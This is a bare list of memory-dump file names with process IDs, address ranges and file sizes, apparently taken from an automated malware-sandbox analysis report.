memory/1532-284-0x0000000000000000-mapping.dmp
-
memory/1748-207-0x0000000000000000-mapping.dmp
-
memory/1848-221-0x00000000001E0000-0x00000000001EC000-memory.dmpFilesize
48KB
-
memory/1848-220-0x0000000000000000-mapping.dmp
-
memory/1848-222-0x0000000000480000-0x00000000004AF000-memory.dmpFilesize
188KB
-
memory/1848-223-0x0000000000480000-0x00000000004AF000-memory.dmpFilesize
188KB
-
memory/2172-233-0x00000000054C0000-0x00000000054E2000-memory.dmpFilesize
136KB
-
memory/2172-230-0x0000000000000000-mapping.dmp
-
memory/2172-232-0x0000000000650000-0x00000000008A8000-memory.dmpFilesize
2.3MB
-
memory/2312-170-0x0000000005560000-0x0000000005B04000-memory.dmpFilesize
5.6MB
-
memory/2312-173-0x0000000006620000-0x000000000662A000-memory.dmpFilesize
40KB
-
memory/2312-169-0x0000000000A70000-0x0000000000BD0000-memory.dmpFilesize
1.4MB
-
memory/2312-171-0x0000000005050000-0x00000000050E2000-memory.dmpFilesize
584KB
-
memory/2312-166-0x0000000000000000-mapping.dmp
-
memory/2312-172-0x00000000050F0000-0x000000000518C000-memory.dmpFilesize
624KB
-
memory/2404-217-0x0000000000000000-mapping.dmp
-
memory/2428-174-0x0000000000000000-mapping.dmp
-
memory/2484-283-0x0000000000000000-mapping.dmp
-
memory/2560-176-0x0000000000400000-0x000000000041D000-memory.dmpFilesize
116KB
-
memory/2560-163-0x0000000000000000-mapping.dmp
-
memory/2560-168-0x0000000000400000-0x000000000041D000-memory.dmpFilesize
116KB
-
memory/2576-328-0x0000000000000000-mapping.dmp
-
memory/2716-329-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmpFilesize
10.8MB
-
memory/2716-318-0x0000000000000000-mapping.dmp
-
memory/2716-322-0x0000000000450000-0x0000000000458000-memory.dmpFilesize
32KB
-
memory/2888-327-0x0000000000000000-mapping.dmp
-
memory/2920-205-0x0000000000000000-mapping.dmp
-
memory/2920-228-0x0000000000000000-mapping.dmp
-
memory/3012-337-0x0000000000000000-mapping.dmp
-
memory/3064-216-0x0000000008010000-0x00000000080CD000-memory.dmpFilesize
756KB
-
memory/3064-144-0x000000000A120000-0x000000000A271000-memory.dmpFilesize
1.3MB
-
memory/3064-153-0x000000000ACC0000-0x000000000AE18000-memory.dmpFilesize
1.3MB
-
memory/3064-154-0x000000000ACC0000-0x000000000AE18000-memory.dmpFilesize
1.3MB
-
memory/3280-340-0x0000000000000000-mapping.dmp
-
memory/3376-298-0x0000000000D30000-0x0000000000DDA000-memory.dmpFilesize
680KB
-
memory/3376-296-0x0000000000000000-mapping.dmp
-
memory/3456-350-0x0000000000000000-mapping.dmp
-
memory/3476-285-0x0000000000000000-mapping.dmp
-
memory/3476-288-0x0000000000400000-0x0000000000457000-memory.dmpFilesize
348KB
-
memory/3508-181-0x0000000000000000-mapping.dmp
-
memory/3676-355-0x0000000000000000-mapping.dmp
-
memory/3872-158-0x0000000000000000-mapping.dmp
-
memory/3896-254-0x0000000000000000-mapping.dmp
-
memory/3896-258-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/3896-260-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/3896-255-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/3896-257-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/3896-267-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/3960-139-0x0000000000000000-mapping.dmp
-
memory/3960-146-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/3960-143-0x0000000001340000-0x0000000001355000-memory.dmpFilesize
84KB
-
memory/3960-142-0x00000000017E0000-0x0000000001B2A000-memory.dmpFilesize
3.3MB
-
memory/3960-141-0x0000000000400000-0x000000000042F000-memory.dmpFilesize
188KB
-
memory/3964-242-0x0000000000000000-mapping.dmp
-
memory/3964-134-0x0000000000000000-mapping.dmp
-
memory/3972-332-0x0000000000000000-mapping.dmp
-
memory/4024-326-0x0000000000000000-mapping.dmp
-
memory/4092-239-0x0000000005F70000-0x0000000005F8E000-memory.dmpFilesize
120KB
-
memory/4092-241-0x0000000006470000-0x000000000648A000-memory.dmpFilesize
104KB
-
memory/4092-236-0x00000000050D0000-0x00000000056F8000-memory.dmpFilesize
6.2MB
-
memory/4092-237-0x0000000005870000-0x00000000058D6000-memory.dmpFilesize
408KB
-
memory/4092-238-0x0000000005950000-0x00000000059B6000-memory.dmpFilesize
408KB
-
memory/4092-234-0x0000000000000000-mapping.dmp
-
memory/4092-219-0x0000000000000000-mapping.dmp
-
memory/4092-240-0x00000000075B0000-0x0000000007C2A000-memory.dmpFilesize
6.5MB
-
memory/4092-235-0x00000000049B0000-0x00000000049E6000-memory.dmpFilesize
216KB
-
memory/4192-331-0x0000000000000000-mapping.dmp
-
memory/4192-336-0x0000000000800000-0x0000000000808000-memory.dmpFilesize
32KB
-
memory/4276-358-0x0000000000000000-mapping.dmp
-
memory/4332-243-0x0000000000000000-mapping.dmp
-
memory/4336-268-0x00000280FC7A0000-0x00000280FD261000-memory.dmpFilesize
10.8MB
-
memory/4336-273-0x00000280FC7A0000-0x00000280FD261000-memory.dmpFilesize
10.8MB
-
memory/4336-264-0x00000280FC7A0000-0x00000280FD261000-memory.dmpFilesize
10.8MB
-
memory/4336-261-0x0000000000000000-mapping.dmp
-
memory/4388-348-0x0000000000000000-mapping.dmp
-
memory/4552-404-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/4668-180-0x0000000000000000-mapping.dmp
-
memory/4700-278-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4700-281-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4700-280-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4700-294-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4700-272-0x0000000000000000-mapping.dmp
-
memory/4700-279-0x0000000000400000-0x000000000047F000-memory.dmpFilesize
508KB
-
memory/4824-276-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmpFilesize
10.8MB
-
memory/4824-253-0x000001833B5B0000-0x000001833B5D2000-memory.dmpFilesize
136KB
-
memory/4824-252-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmpFilesize
10.8MB
-
memory/4824-251-0x000001833B210000-0x000001833B240000-memory.dmpFilesize
192KB
-
memory/4824-249-0x0000000000000000-mapping.dmp
-
memory/4824-266-0x00007FFBD9150000-0x00007FFBD9C11000-memory.dmpFilesize
10.8MB
-
memory/4836-244-0x0000000000000000-mapping.dmp
-
memory/4836-247-0x0000000000040000-0x00000000001A0000-memory.dmpFilesize
1.4MB
-
memory/4844-149-0x0000000000F80000-0x0000000000FAF000-memory.dmpFilesize
188KB
-
memory/4844-145-0x0000000000000000-mapping.dmp
-
memory/4844-150-0x0000000003120000-0x000000000346A000-memory.dmpFilesize
3.3MB
-
memory/4844-151-0x0000000002EB0000-0x0000000002F44000-memory.dmpFilesize
592KB
-
memory/4844-152-0x0000000000F80000-0x0000000000FAF000-memory.dmpFilesize
188KB
-
memory/4844-148-0x0000000000610000-0x0000000000626000-memory.dmpFilesize
88KB
-
memory/4880-218-0x0000000000000000-mapping.dmp
-
memory/4892-227-0x0000000000200000-0x0000000000360000-memory.dmpFilesize
1.4MB
-
memory/4892-225-0x0000000000000000-mapping.dmp
-
memory/4900-316-0x0000000000000000-mapping.dmp
-
memory/4904-344-0x0000000000000000-mapping.dmp
-
memory/4944-300-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4944-302-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4944-301-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4944-307-0x0000000000400000-0x0000000000497000-memory.dmpFilesize
604KB
-
memory/4944-299-0x0000000000000000-mapping.dmp
-
memory/5028-310-0x0000000000000000-mapping.dmp
-
memory/5056-353-0x0000000000000000-mapping.dmp
-
memory/5064-175-0x0000000000000000-mapping.dmp
-
memory/5136-438-0x0000000000400000-0x0000000000467000-memory.dmpFilesize
412KB
-
memory/5136-439-0x0000000000400000-0x0000000000467000-memory.dmpFilesize
412KB
-
memory/5136-440-0x0000000000400000-0x0000000000467000-memory.dmpFilesize
412KB
-
memory/5140-360-0x0000000000000000-mapping.dmp
-
memory/5344-362-0x0000000000000000-mapping.dmp
-
memory/5444-434-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/5472-396-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/5472-397-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/5472-398-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/5472-399-0x0000016A992E0000-0x0000016A99300000-memory.dmpFilesize
128KB
-
memory/5860-414-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB
-
memory/5860-416-0x0000000140000000-0x00000001407C9000-memory.dmpFilesize
7.8MB